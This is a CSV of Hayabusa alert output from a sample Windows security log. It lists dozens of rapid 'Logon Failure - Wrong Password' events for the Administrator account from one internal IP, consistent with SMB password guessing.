2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
